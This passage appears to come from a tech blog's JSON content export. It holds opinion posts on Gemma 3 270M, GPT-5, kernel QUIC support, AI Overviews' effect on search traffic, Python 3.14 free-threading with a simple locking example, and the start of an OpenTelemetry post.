Not even slightly.\n","date":"21 August 2025","externalUrl":null,"permalink":"/posts/250821-uv-code-formatting-python-tooling/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The uv package manager experimentally adds code formatting, continuing its ambitious push to become a single tool for the entire Python development workflow.","title":"uv Adds Code Formatting — Python's Tooling Consolidation Continues","type":"posts"},{"content":"While everyone\u0026rsquo;s still digesting last week\u0026rsquo;s GPT-5 launch, Google quietly released something that might be more consequential for day-to-day development: Gemma 3 270M, a compact language model with just 270 million parameters that punches well above its weight class. In a world obsessed with scaling up, this is a compelling argument for scaling down.\nThe release landed on Hacker News with significant attention, and for good reason. When a model this small can handle useful tasks effectively, it changes the economics and accessibility of AI in ways that billion-parameter models simply can\u0026rsquo;t.\nWhy 270 Million Parameters Matters # To put this in perspective: GPT-5 likely has hundreds of billions of parameters (OpenAI doesn\u0026rsquo;t disclose exact numbers). Gemma 3 270M has roughly a thousand times fewer. And yet, for a surprising range of tasks, this tiny model delivers genuinely useful results.\nIt runs on anything. A 270M parameter model fits comfortably on a smartphone, a Raspberry Pi, or a low-end laptop. No GPU required, no cloud API calls, no usage fees. You download it and run it locally. This isn\u0026rsquo;t a future promise — it works today.\nInference is fast. On even modest hardware, you\u0026rsquo;re looking at response times measured in milliseconds, not seconds. For applications where latency matters — autocomplete, real-time suggestions, on-device processing — this speed advantage is enormous.\nPrivacy is built in. 
When the model runs on-device, your data never leaves the device. No API call logs, no third-party processing, no data retention policies to worry about. For applications dealing with sensitive data — healthcare, legal, financial — this is transformative.\nWhat It Can Actually Do # Let me be realistic about capabilities. A 270M parameter model isn\u0026rsquo;t going to write your architecture document or debug a complex distributed system. But here\u0026rsquo;s what it can do well:\nText classification and sentiment analysis work remarkably well at this scale. If you need to categorize support tickets, flag potentially sensitive content, or analyze user feedback, Gemma 3 270M handles these tasks with accuracy that would have required much larger models just a year ago.\nCode completion for common patterns is viable. Not complex multi-file refactoring, but the kind of boilerplate completion and pattern matching that makes a real difference in daily coding. Think: completing function signatures, generating standard error handling blocks, filling in common API call patterns. This complements the larger role AI assistants are playing in development workflows, with small models handling efficient edge cases.\nSummarization and extraction of structured information from documents works surprisingly well for a model this size. Pulling key fields from invoices, extracting entities from support emails, summarizing short documents — these practical tasks are well within reach.\nOn-device search and retrieval — when combined with a small embedding model, you can build a complete local search system that understands natural language queries without any cloud dependency.\nThe Architecture Story # What makes Gemma 3 270M interesting from a technical perspective is how Google achieved these capabilities at this scale. The model benefits from improved training techniques — better data curation, more efficient tokenization, and distillation from larger models in the Gemma family. 
This mirrors the broader architectural improvements happening in language models, where efficiency and capability become equally important.\nThis follows a trend that I think is underappreciated: the biggest advances in practical AI aren\u0026rsquo;t coming from making models bigger. They\u0026rsquo;re coming from making smaller models better. Techniques like knowledge distillation, quantization-aware training, and improved data quality are making it possible to pack more capability into fewer parameters.\nFor developers, this means the barrier to adding AI features to applications keeps dropping. You don\u0026rsquo;t need a GPU cluster or a five-figure monthly API bill. You need a good small model and a clear understanding of what task you\u0026rsquo;re solving.\nPractical Integration Patterns # If you\u0026rsquo;re considering using Gemma 3 270M (or similar small models) in your applications, here are patterns that work well:\nEdge preprocessing: Use the small model on-device for initial classification or filtering, then send only the complex cases to a larger cloud model. This dramatically reduces API costs and latency for the majority of requests.\nOffline-first applications: Build features that work without network connectivity. Mobile apps, field tools, embedded systems — the small model handles the common cases locally, syncing with more capable models when connectivity is available.\nPrivacy-sensitive pipelines: Process sensitive data locally with the small model, only sending anonymized or aggregated results to cloud services. This can simplify compliance with GDPR, HIPAA, and other data protection frameworks.\nDevelopment and testing: Use small models for rapid prototyping and testing of AI-powered features. 
The fast iteration cycle — no API calls, no rate limits, instant responses — accelerates development significantly.\nThe Open Source Advantage # Gemma 3 270M is released with open weights, which means the community can fine-tune it for specific domains and tasks. I expect we\u0026rsquo;ll see domain-specific versions appearing within weeks — a code-focused variant, a medical text variant, models fine-tuned for specific languages.\nThis is where small open models have an enormous advantage over large closed models. Fine-tuning a 270M parameter model is something you can do on a single consumer GPU in a few hours. Fine-tuning a 70B+ model requires significant infrastructure and expertise. The democratization of model customization at this scale is genuinely exciting.\nMy Take # In the rush to build and deploy ever-larger AI models, we sometimes lose sight of a fundamental engineering principle: use the smallest tool that gets the job done. Gemma 3 270M is a reminder that for many practical applications, the right model isn\u0026rsquo;t the most powerful one — it\u0026rsquo;s the most efficient one.\nI\u0026rsquo;ve been experimenting with small models for edge deployment in IoT contexts for a while now, and the capabilities keep getting more impressive with each generation. If your reaction to Gemma 3 270M is \u0026ldquo;that\u0026rsquo;s too small to be useful,\u0026rdquo; I\u0026rsquo;d encourage you to actually try it on your specific use case. You might be surprised.\nThe future of AI in production isn\u0026rsquo;t just about the headline-grabbing mega-models. It\u0026rsquo;s about having the right model at the right size in the right place. 
And right now, tiny models that run anywhere are solving real problems that big models can\u0026rsquo;t touch.\n","date":"14 August 2025","externalUrl":null,"permalink":"/posts/250814-gemma3-270m-small-models-big-impact/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google releases Gemma 3 at 270M parameters, proving that smaller, more efficient models might matter more than the next big model launch.","title":"Google's Gemma 3 270M — Why Tiny Models Are the Real AI Story","type":"posts"},{"content":" Overview # While proprietary AI models dominate headlines, an open-source AI movement is rapidly maturing. This series covers open-weight models (Llama, Mistral, Qwen), community-driven fine-tuning, the licensing challenges unique to AI (what does \u0026ldquo;open source\u0026rdquo; mean for models?), and how open development is reshaping the AI landscape.\nOpen models enable self-hosting, fine-tuning for specific domains, and reduced dependence on proprietary APIs.\nWhat You\u0026rsquo;ll Find Here # Open-Weight Models: Tracking important open-weight releases, comparing their capabilities to proprietary alternatives, and understanding licensing implications.\nCommunity Fine-Tuning: How open models enable organizations to adapt them for specific use cases, custom adapters, and transfer learning approaches.\nLicensing Debates: Understanding what open source means for AI—license implications, commercial use restrictions, and emerging frameworks.\nSelf-Hosting: Tools and infrastructure for running models locally—quantization, inference optimization, and deployment patterns.\nEvaluation \u0026amp; Benchmarking: How to fairly compare open models, run benchmarks locally, and understand when open alternatives are sufficient.\nEcosystem Development: Tools, frameworks, and communities building around open AI—from Hugging Face to specialized inference engines.\nLearning Path # Understand the open AI landscape — major open-weight models and 
their characteristics Evaluate commercial viability — understand licensing, cost, and practical trade-offs with proprietary services Learn fine-tuning techniques — LoRA, QLoRA, and other adaptation methods that enable customization Explore deployment options — self-hosting, managed open services, and infrastructure requirements Build with open models — practical patterns for leveraging open models in production systems Key Areas Covered # Open-Weight Models: Llama, Mistral, Qwen, Phi, and other foundation models Fine-Tuning Methods: LoRA, QLoRA, prefix tuning, and efficient adaptation Licensing: Open Rail, Llama community license, commercial restrictions, and compliance Infrastructure: vLLM, Ollama, LM Studio, TGI, and inference optimization Evaluation: Custom benchmarks, domain-specific evaluation, and local testing approaches Frameworks: Hugging Face Transformers, LangChain, LlamaIndex, and integration tools Quantization: GGUF, GPTQ, AWQ, and reducing model size for local deployment Related Series # Explore complementary areas: AI Models \u0026amp; Releases (proprietary models and their development), Python Evolution (Python frameworks for working with AI models)\n","date":"14 August 2025","externalUrl":null,"permalink":"/series/open-source-ai/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Open Source AI","type":"series"},{"content":"","date":"7 August 2025","externalUrl":null,"permalink":"/tags/gpt/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"GPT","type":"tags"},{"content":"OpenAI released GPT-5 today, and the Hacker News thread has already blown past 2,000 comments. 
After spending a few hours with the model and reading through Simon Willison\u0026rsquo;s excellent breakdown of the system card and pricing, I have some initial thoughts on what this means for those of us who actually build things with these models.\nLet me be upfront: I\u0026rsquo;m going to focus on what\u0026rsquo;s practically different for developers rather than getting caught up in benchmark numbers. We\u0026rsquo;ve all seen enough cherry-picked demos to know that the real test is sustained, production-level performance on the messy, ambiguous tasks that make up actual software development. This mirrors how reasoning models and extended thinking are transforming complex problem-solving, with real-world benefits that go beyond marketing claims.\nWhat\u0026rsquo;s Genuinely New # GPT-5 represents a meaningful step forward in several areas that matter for production use:\nContext handling has improved substantially. The model is better at maintaining coherence across long conversations and large codebases. If you\u0026rsquo;ve been frustrated by GPT-4\u0026rsquo;s tendency to \u0026ldquo;forget\u0026rdquo; earlier context in long sessions, GPT-5 handles this noticeably better. For code review and refactoring tasks that require understanding an entire module or service, this is a real improvement.\nInstruction following is tighter. The gap between what you ask for and what you get has narrowed. This might sound minor, but if you\u0026rsquo;re building automated pipelines that depend on consistent LLM output formatting, fewer parsing failures and edge cases translate directly into more reliable systems.\nReasoning about code shows improvement on complex, multi-step problems. 
I threw some of my standard test cases at it — debugging race conditions, explaining complex type system interactions, analyzing security implications of design choices — and the results were consistently better than GPT-4, particularly on problems that require holding multiple concerns in mind simultaneously.\nThe Pricing Question # The pricing structure deserves attention because it affects architectural decisions. Based on the initial numbers, GPT-5 is more expensive per token than GPT-4, which was already not cheap for high-volume applications. This reinforces a pattern I\u0026rsquo;ve been advocating for: use the right model for the right task.\nFor many production applications, the smart move isn\u0026rsquo;t to upgrade everything to GPT-5. It\u0026rsquo;s to use GPT-5 for the tasks where it genuinely outperforms cheaper models — complex reasoning, nuanced code generation, difficult debugging — and keep using smaller, faster, cheaper models for classification, simple extraction, and routine tasks. This aligns with broader cloud cost optimization and infrastructure efficiency concerns.\nIf you\u0026rsquo;re not already implementing model routing in your AI-powered applications, now\u0026rsquo;s the time. A simple dispatcher that sends easy queries to a small model and complex queries to GPT-5 can cut your API costs dramatically while actually improving latency for the majority of requests.\nThe Developer Experience Angle # OpenAI also published a GPT-5 for Developers guide, which signals they\u0026rsquo;re taking the developer experience seriously. The API improvements include better streaming support, more granular control over response formatting, and improved function calling reliability.\nThe function calling improvements are particularly interesting for anyone building agents or tool-using systems. 
GPT-4\u0026rsquo;s function calling was good but had a frustrating failure mode where it would sometimes call functions with subtly wrong parameter types or make unnecessary calls. Early testing suggests GPT-5 is more disciplined here.\nFor those of us building development tools that integrate LLMs, the improved consistency means less defensive coding around LLM outputs. You still need error handling — these are probabilistic systems — but the error rate seems genuinely lower.\nWhat Hasn\u0026rsquo;t Changed # Let me be the pragmatist in the room: GPT-5 doesn\u0026rsquo;t solve the fundamental limitations of LLMs for software development.\nIt still hallucinates. Less frequently, perhaps, but it still confidently generates code that references APIs that don\u0026rsquo;t exist or uses library features from the wrong version. You still need tests, code review, and verification for anything it produces.\nIt still struggles with novel architectures. If you\u0026rsquo;re working with a framework or pattern that isn\u0026rsquo;t well-represented in the training data, GPT-5 will still give you plausible-looking but incorrect solutions. The model is better, not magical.\nIt doesn\u0026rsquo;t replace understanding. I\u0026rsquo;ve seen a growing trend of developers treating LLMs as oracles rather than tools, accepting generated code without understanding it. GPT-5 being better at generating correct code might actually make this worse, because the failure modes become subtler and harder to catch. AI-assisted testing frameworks are essential for maintaining code quality when relying on generated code, and security-focused practices ensure generated code doesn\u0026rsquo;t introduce vulnerabilities.\nThe Open Source Response # Every major OpenAI release accelerates the open-source AI community. I expect we\u0026rsquo;ll see a flurry of activity in the coming weeks as researchers analyze GPT-5\u0026rsquo;s capabilities and work to replicate them in open models. 
The gap between closed and open models has been narrowing steadily, and GPT-5 will set new targets for projects like Llama, Mistral, and others to aim for.\nFor teams that need to run models on-premises — whether for data privacy, latency, or cost reasons — the open-source trajectory remains encouraging even as GPT-5 raises the bar.\nMy Take # GPT-5 is a genuine improvement, not just an incremental version bump with better marketing. The improvements in context handling and instruction following address real pain points that I\u0026rsquo;ve hit repeatedly in production systems.\nBut I want to push back on the narrative that each new model release fundamentally changes what\u0026rsquo;s possible. The jump from GPT-3.5 to GPT-4 was transformative — it crossed a threshold where LLMs became genuinely useful for professional software development. GPT-5 makes that experience better and more reliable, but it\u0026rsquo;s an evolution, not a revolution.\nThe most important thing you can do today isn\u0026rsquo;t rush to upgrade everything to GPT-5. It\u0026rsquo;s to think carefully about where LLMs add value in your workflow, build robust evaluation frameworks, and make sure you can swap models easily as the landscape continues to evolve. The model you should use six months from now might not be from OpenAI at all.\nThat said, if you haven\u0026rsquo;t already, go try it. Form your own opinions. The best way to understand what a new model can do is to throw your hardest problems at it and see what comes back.\n","date":"7 August 2025","externalUrl":null,"permalink":"/posts/250807-gpt5-launch-developer-implications/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI launches GPT-5 with significant improvements. 
Here’s what matters for developers beyond the marketing.","title":"GPT-5 Is Here — A Developer's First Look at What Actually Changed","type":"posts"},{"content":"","date":"7 August 2025","externalUrl":null,"permalink":"/tags/openai/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"OpenAI","type":"tags"},{"content":"There\u0026rsquo;s been a lot of talk about QUIC over the past few years, but this week the conversation shifted from \u0026ldquo;QUIC is interesting\u0026rdquo; to \u0026ldquo;QUIC is becoming infrastructure.\u0026rdquo; A detailed write-up on LWN.net covered the ongoing effort to bring QUIC support directly into the Linux kernel, and the implications for anyone running server infrastructure are substantial.\nFor those who haven\u0026rsquo;t been tracking this: QUIC is the transport protocol that underpins HTTP/3. Originally developed by Google, it\u0026rsquo;s been an IETF standard since 2021. Until now, QUIC has lived entirely in userspace — libraries like quiche, ngtcp2, and the various language-specific implementations handle the protocol. This mirrors the broader infrastructure consolidation happening across cloud platforms. Moving it into the kernel is a fundamentally different proposition.\nWhy Kernel-Level QUIC Matters # The obvious question is: if userspace QUIC works fine, why bother with a kernel implementation? The answer comes down to performance, integration, and the long game.\nPerformance: Userspace QUIC implementations involve copying data between kernel and userspace buffers, context switches for every packet, and duplicated functionality that the kernel\u0026rsquo;s networking stack already handles efficiently. For high-throughput servers handling thousands of concurrent connections, this overhead adds up. 
Kernel QUIC can leverage zero-copy techniques, integrate with the existing socket API, and benefit from the kernel\u0026rsquo;s packet scheduling infrastructure.\nSocket API compatibility: Right now, applications that want to use QUIC need to integrate with a specific QUIC library. A kernel implementation exposes QUIC through the familiar socket API, meaning existing applications could potentially switch transport protocols with minimal code changes. Think about what happened when TLS got kTLS kernel support — it enabled transparent TLS offloading for applications that didn\u0026rsquo;t need to know about the details.\nHardware offloading: Network interface cards are increasingly capable of offloading protocol processing. TCP offloading is mature; QUIC offloading is coming. But hardware offload works best when the protocol is in the kernel where the NIC driver lives. Kernel QUIC opens the door for QUIC-aware NICs to handle encryption and packet processing in hardware.\nThe Implementation Challenges # Bringing QUIC into the kernel isn\u0026rsquo;t straightforward, and the LWN discussion highlighted several interesting challenges.\nQUIC is fundamentally different from TCP in ways that make kernel integration tricky. Each QUIC connection uses its own encryption context, meaning the kernel needs to manage potentially millions of independent TLS contexts. TCP\u0026rsquo;s kernel TLS implementation handles a simpler case because TCP connections share more infrastructure.\nConnection migration — one of QUIC\u0026rsquo;s headline features, allowing connections to survive IP address changes — requires the kernel to maintain connection state that\u0026rsquo;s indexed differently from traditional socket lookups. 
The kernel\u0026rsquo;s networking stack is heavily optimized around the four-tuple (source IP, source port, destination IP, destination port), but QUIC uses connection IDs that are independent of network addresses.\nThere\u0026rsquo;s also the question of how much of QUIC belongs in the kernel versus userspace. The current proposals take a hybrid approach: the kernel handles the transport layer (packet I/O, congestion control, encryption for data packets) while handshake and connection management remain in userspace. This is pragmatic — it gets the performance benefits without trying to shove the entire QUIC state machine into kernel space.\nWhat This Means for DevOps # If you\u0026rsquo;re running infrastructure today, here\u0026rsquo;s what to watch for:\nnginx, HAProxy, and friends will eventually gain kernel QUIC support, likely showing meaningful performance improvements for HTTP/3 workloads. If you\u0026rsquo;re already serving HTTP/3, the transition should be mostly transparent — better performance without configuration changes.\nLoad balancers get interesting because QUIC\u0026rsquo;s connection migration feature means traditional layer-4 load balancing approaches need rethinking. A connection that starts on one server IP might migrate to another, and the load balancer needs to handle this gracefully. Kernel-level awareness helps here.\nMonitoring and observability will need updates. Tools that do packet inspection at the kernel level (eBPF-based tools, tc filters, etc.) will need to understand QUIC\u0026rsquo;s encrypted transport. Unlike TCP, you can\u0026rsquo;t just peek at headers — QUIC encrypts almost everything.\nContainer networking implementations (Cilium, Calico, etc.) will need to account for QUIC kernel support in their networking policies. eBPF programs that currently handle TCP and UDP will need QUIC-aware paths.\nThe Bigger Picture # What I find most interesting about this development is what it says about protocol evolution. 
HTTP moved from TCP to QUIC in userspace first, proving the protocol worked at scale. Now it\u0026rsquo;s moving into the kernel for performance. This pattern — prototype in userspace, prove at scale, then optimize in the kernel — is becoming the standard approach for networking innovation.\nCompare this to how TCP evolved: everything happened in the kernel, making experimentation slow and risky. The QUIC approach is healthier. We got years of production experience from Google, Cloudflare, and others running userspace QUIC before anyone had to commit to a kernel implementation. This pattern of infrastructure maturation and optimization is becoming more common across technology stacks.\nMy Take # I\u0026rsquo;ve been managing Linux servers since the 2.4 kernel days, and watching the networking stack evolve has been one of the more fascinating threads in systems engineering. Kernel QUIC feels like the next major inflection point after kTLS.\nThe practical impact won\u0026rsquo;t be immediate — we\u0026rsquo;re probably looking at a year or more before kernel QUIC is stable and widely deployed. But if you\u0026rsquo;re designing infrastructure that needs to last, building with HTTP/3 and QUIC in mind is no longer forward-thinking — it\u0026rsquo;s just good engineering.\nThe performance improvements alone should get your attention. But the real win is that kernel QUIC makes the protocol a first-class citizen of the Linux networking stack, which means the entire ecosystem of tools, monitoring, and optimization that\u0026rsquo;s been built around kernel networking will eventually work with QUIC too. This is exactly the kind of observability and tooling maturation that platform teams rely on.\nStart testing HTTP/3 in your staging environments if you haven\u0026rsquo;t already. 
When kernel QUIC lands in your distribution\u0026rsquo;s default kernel, you\u0026rsquo;ll want to be ready to take advantage of it.\n","date":"31 July 2025","externalUrl":null,"permalink":"/posts/250731-quic-protocol-linux-kernel/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The push to bring QUIC protocol support into the Linux kernel marks a significant shift in how we think about transport-layer networking.","title":"QUIC Comes to the Linux Kernel — What It Means for Infrastructure","type":"posts"},{"content":"The data is in, and it\u0026rsquo;s not pretty. According to a comprehensive analysis covered by Ars Technica, Google\u0026rsquo;s AI Overviews feature is causing a dramatic decline in organic search clicks. We\u0026rsquo;re talking double-digit percentage drops for many query categories. If you build anything that depends on search traffic — and let\u0026rsquo;s be honest, who doesn\u0026rsquo;t — this should have your full attention.\nI\u0026rsquo;ve been watching this unfold since AI Overviews rolled out more broadly, and while the writing was on the wall, the scale of the impact is still striking. Google has effectively inserted itself as the answer layer between users and websites, and the consequences are rippling through the entire web ecosystem. This mirrors the broader regulatory and structural tensions emerging around how AI systems interact with human-created content.\nWhat the Numbers Actually Show # The core finding is straightforward: when Google provides an AI-generated summary at the top of search results, users click through to actual websites far less frequently. This isn\u0026rsquo;t surprising in isolation — if you get your answer without clicking, why would you click? But the aggregate effect across billions of searches is reshaping traffic patterns in ways that affect everyone from solo bloggers to major publications.\nInformational queries are hit hardest. 
The kind of \u0026ldquo;how does X work\u0026rdquo; or \u0026ldquo;what is Y\u0026rdquo; searches that used to drive traffic to documentation sites, tutorials, and knowledge bases are now being answered directly in the search results page. For developers, this means Stack Overflow, MDN, and countless tutorial sites are seeing diminished referral traffic.\nThe irony isn\u0026rsquo;t lost on me: Google trained its AI on content from these very sites, and now that AI is reducing the traffic those sites receive. It\u0026rsquo;s a feedback loop that could eventually degrade the quality of the training data itself.\nThe Developer Impact # As someone who\u0026rsquo;s maintained technical documentation and blogs for decades, this shift hits close to home. But let me be specific about what this means for our world:\nDocumentation sites that rely on search traffic to justify their existence (and funding) are going to face harder conversations about sustainability. If Google answers \u0026ldquo;how to configure nginx reverse proxy\u0026rdquo; with an AI summary, fewer people visit the actual nginx docs or the carefully written blog post that explained the nuances.\nAPI documentation is somewhat insulated — you still need to visit the actual docs to get current endpoint details — but conceptual and tutorial content is squarely in the firing line.\nDeveloper tool marketing that depends on organic search is getting squeezed. 
If you\u0026rsquo;re a small startup trying to get discovered through \u0026ldquo;best testing framework for React\u0026rdquo; type searches, AI Overviews might be giving a summary that never mentions you, or worse, summarizes your competitor\u0026rsquo;s content without linking to either.\nThe Broader Web Ecosystem Question # This development connects to a larger question I\u0026rsquo;ve been turning over: what happens to the open web when the primary discovery mechanism starts consuming content rather than directing users to it?\nWe\u0026rsquo;ve already seen this pattern with social media platforms — Facebook\u0026rsquo;s pivot to keeping users on-platform rather than clicking out to articles devastated many publishers years ago. Google doing the same thing with search is arguably more consequential because search has been the backbone of web content discovery for two decades.\nSimilar policy frameworks like the EU AI Act also struggle to address how AI-powered platforms reshape content economics. The policy community isn\u0026rsquo;t keeping pace with the technology. We\u0026rsquo;re getting policy frameworks for AI safety and development, but the economic restructuring that AI-powered search causes for web publishers is largely being ignored.\nWhat Can We Actually Do? # I don\u0026rsquo;t think the answer is to fight the technology — that\u0026rsquo;s a losing battle. But there are practical responses:\nStructured data becomes more important than ever. If AI is going to summarize your content, making sure it can accurately represent your information (and attribute it) requires clean, well-structured markup.\nBuild direct audiences. Email newsletters, RSS feeds, community forums — anything that creates a direct relationship with your readers rather than depending on Google as an intermediary. This lesson echoes what we\u0026rsquo;re learning from platform consolidation in development tooling. 
I know this sounds like advice from 2015, but it\u0026rsquo;s never been more relevant.\nCreate content that can\u0026rsquo;t be easily summarized. Interactive tools, detailed tutorials with working code examples, opinionated analysis — content that requires context and engagement rather than a simple factual answer.\nConsider the API-first approach. If your content or tool is genuinely useful, making it accessible programmatically might be more sustainable than depending on web traffic.\nMy Take # I\u0026rsquo;ve been in tech long enough to have seen several platform shifts that reshuffled winners and losers. This one feels particularly significant because search has been the one constant — the reliable way that content found its audience. Watching that relationship get intermediated by AI summaries is uncomfortable, but it\u0026rsquo;s also forcing a useful reckoning.\nThe web has been too dependent on a single company\u0026rsquo;s algorithm for too long. Maybe this is the push that finally diversifies how we discover and share technical knowledge. Or maybe it just consolidates Google\u0026rsquo;s position further. 
Right now, I\u0026rsquo;d bet on the latter, but I\u0026rsquo;m hoping to be wrong.\nWhat I do know is that if you\u0026rsquo;re building anything on the web today, factoring in a world where search traffic is significantly reduced isn\u0026rsquo;t pessimism — it\u0026rsquo;s planning.\n","date":"24 July 2025","externalUrl":null,"permalink":"/posts/250724-ai-overviews-search-traffic-decline/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google’s AI Overviews are causing a massive drop in organic search clicks, reshaping how the web works for publishers and developers alike.","title":"AI Overviews Are Crushing Search Traffic — And We Should Have Seen It Coming","type":"posts"},{"content":"Python 3.14 beta is here, and while the version number alone invites pi jokes, the real story is the continued progress on one of the most ambitious changes in Python\u0026rsquo;s history: the experimental free-threaded build that removes the Global Interpreter Lock (GIL). After decades of the GIL defining Python\u0026rsquo;s concurrency story, we\u0026rsquo;re getting our first real taste of what Python looks like without it.\nThe GIL, For Those Who Haven\u0026rsquo;t Suffered # If you\u0026rsquo;ve ever tried to speed up a CPU-bound Python program by throwing threads at it, you\u0026rsquo;ve met the GIL. The Global Interpreter Lock is a mutex that protects access to Python objects, ensuring that only one thread executes Python bytecode at a time. It simplifies the implementation of CPython and makes C extensions safer to write, but it means that multithreaded Python programs can\u0026rsquo;t truly utilize multiple CPU cores for CPU-bound work.\nThis has been Python\u0026rsquo;s most notorious limitation. We\u0026rsquo;ve worked around it for years — multiprocessing, asyncio, Cython, offloading to C extensions — but these are all workarounds, not solutions. 
PEP 703, which proposed making the GIL optional, was accepted in 2023, and the implementation has been progressing through CPython development since then.\nWhat\u0026rsquo;s in the 3.14 Beta # The free-threaded build (enabled with --disable-gil at compile time, or available as a separate installer) has made significant progress since the initial experimental support in Python 3.13. Key improvements in the 3.14 beta include:\nBetter performance for single-threaded code: One of the major concerns with removing the GIL was that single-threaded performance would regress. The 3.14 beta narrows this gap significantly. While the free-threaded build is still slightly slower than the default GIL-enabled build for single-threaded workloads, the difference is now in the low single-digit percentages for most benchmarks, down from the 5-10% regression seen in earlier builds.\nImproved C extension compatibility: The Py_GIL_DISABLED build flag and related C API changes are better documented and more stable. Several major packages — NumPy, Cython, and others — have been working on free-threaded compatible builds, and the ecosystem support is growing.\nNew synchronization primitives: The threading module gains new primitives designed for the free-threaded world, including more efficient locks and better support for lock-free data structures. The concurrent.futures module also sees improvements that take advantage of true thread parallelism.\nPer-object locking: Instead of one big lock for everything, the free-threaded interpreter uses fine-grained, per-object locks. This is what enables true parallelism while still protecting against data races on individual objects.\nReal-World Implications # Let me paint a picture of what this means in practice. Consider a web application running under a WSGI server. Today, if you want to handle concurrent requests in a single process, you use threads — but the GIL means those threads can\u0026rsquo;t truly execute Python code in parallel. 
For I/O-bound work (waiting on database queries, HTTP calls), this is fine because the GIL is released during I/O. But any CPU-bound work — template rendering, data serialization, business logic — is serialized.\nWith free-threaded Python, those threads can genuinely run in parallel. A 4-core machine running a single Python process with 4 worker threads could, in principle, handle 4x the CPU-bound throughput of a GIL-constrained process. No more spawning multiple processes with gunicorn --workers 4 and paying the memory overhead of duplicating your application state.\nFor data science and scientific computing, the implications are even more dramatic. Operations that currently require multiprocessing (with its serialization overhead for inter-process communication) could use threads with shared memory instead. Parallel data processing pipelines become simpler to write and more memory-efficient.\nThe Ecosystem Challenge # Here\u0026rsquo;s the part that tempers my excitement: the ecosystem isn\u0026rsquo;t ready yet, and it won\u0026rsquo;t be for a while. The free-threaded build requires C extensions to be explicitly compatible. Any extension that relies on the GIL for thread safety — and many do, often implicitly — needs to be audited and potentially rewritten.\nThe Python Packaging Authority (PyPA) is working on mechanisms to distribute separate wheel builds for GIL-enabled and free-threaded Python, but this means package maintainers need to test against both variants. 
For the hundreds of thousands of packages on PyPI, this is a massive undertaking.\nIn practice, I expect the adoption path to look something like this:\nNow through 2026: Early adopters experiment with free-threaded builds for new projects with minimal C extension dependencies 2026-2027: Major packages achieve free-threaded compatibility, enabling broader adoption 2027-2028: Free-threaded becomes the default build, with GIL available as a fallback Eventually: The GIL-enabled build is deprecated Writing Thread-Safe Python # One thing that developers need to internalize: without the GIL, Python code that was \u0026ldquo;accidentally thread-safe\u0026rdquo; due to the GIL is no longer safe. Consider a simple counter:\ncounter = 0 def increment(): global counter counter += 1 With the GIL, concurrent calls to increment() rarely interleave at the wrong moment, so this usually appears to work in practice, but counter += 1 is a separate read, add, and write, and it was never guaranteed to be atomic. Without the GIL, this is a classic data race. You need proper synchronization:\nimport threading counter = 0 lock = threading.Lock() def increment(): global counter with lock: counter += 1 This is basic concurrent programming, but many Python developers have never had to think about it because the GIL provided a safety net. The transition will require a mindset shift across the Python community.\nMy Take # I\u0026rsquo;ve been writing Python since the 2.x days, and the GIL has always been the elephant in the room — the thing that made Python \u0026ldquo;not a real language\u0026rdquo; in the eyes of systems programmers. Seeing it finally become optional is remarkable, and the engineering effort behind PEP 703 is impressive.\nBut I\u0026rsquo;d counsel patience. The free-threaded build is explicitly experimental in 3.14, and for good reason. Don\u0026rsquo;t rush to deploy it in production. Do start experimenting with it in development, especially if you\u0026rsquo;re a library author. 
Understanding how your code behaves without the GIL now will prepare you for the day when it becomes the default.\nPython\u0026rsquo;s evolution continues to impress me. It\u0026rsquo;s a language that consistently chooses pragmatic, incremental improvement over revolutionary breaking changes, and the GIL removal is following that same playbook. Slowly, carefully, but decisively.\nThe 3.14 beta is worth installing alongside your production Python. The future of Python parallelism is being built right now, and it\u0026rsquo;s exciting to watch it take shape.\n","date":"17 July 2025","externalUrl":null,"permalink":"/posts/250717-python-314-free-threading/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.14’s beta release showcases the experimental free-threaded mode, promising true parallelism without the GIL — and the implications for the Python ecosystem are enormous.","title":"Python 3.14 Beta and the Free-Threading Revolution","type":"posts"},{"content":"It\u0026rsquo;s been a long road, but OpenTelemetry has effectively reached full maturity. With the logging signal now generally available across the major language SDKs — joining traces and metrics that have been stable for a while — the project has delivered on its original promise: a single, vendor-neutral standard for all three pillars of observability. This maturation mirrors what we\u0026rsquo;ve seen across the platform engineering landscape, where infrastructure consolidation creates value. For those of us who\u0026rsquo;ve spent years navigating the fragmented observability tooling landscape, this is a genuinely significant milestone.\nWhy This Matters # To appreciate why OpenTelemetry\u0026rsquo;s maturity is a big deal, you need to understand the pain it was designed to solve. Before OTel, if you wanted observability in your application, you were essentially locked into a vendor\u0026rsquo;s SDK. Want to use Datadog? Import their libraries. Prefer New Relic? 
Different libraries. Switching vendors meant re-instrumenting your entire codebase.\nThe OpenTracing and OpenCensus projects tried to solve this with open standards, but having two competing \u0026ldquo;open\u0026rdquo; standards was almost worse than having none. The merger of these projects into OpenTelemetry in 2019 was the right move, but it meant years of development to build a comprehensive, production-ready framework.\nNow, with all three signals — traces, metrics, and logs — at GA status, teams can instrument once and send telemetry data to any compatible backend. Jaeger, Zipkin, Prometheus, Datadog, New Relic, Grafana Cloud, Honeycomb — they all speak OTel. Your instrumentation code is no longer a vendor commitment.\nThe Logging Signal Changes Things # Traces and metrics reaching GA was important, but logging completing the picture changes how we should think about observability architectures. Here\u0026rsquo;s why:\nTraditional logging (think: structured JSON logs sent to Elasticsearch or CloudWatch) and distributed tracing have historically been separate systems with separate instrumentation, separate storage, and separate query interfaces. Correlating a log entry with a trace span required manually propagating trace IDs through your logging framework — doable, but tedious and error-prone.\nWith OpenTelemetry\u0026rsquo;s logging signal, logs are first-class citizens in the same telemetry pipeline as traces and metrics. Log records can be automatically correlated with trace contexts, meaning you can click from a slow trace span directly into the relevant log entries without manual correlation. This is the kind of integrated observability experience that was previously only available within proprietary platforms.\nThe OTel log bridge API is particularly well-designed. 
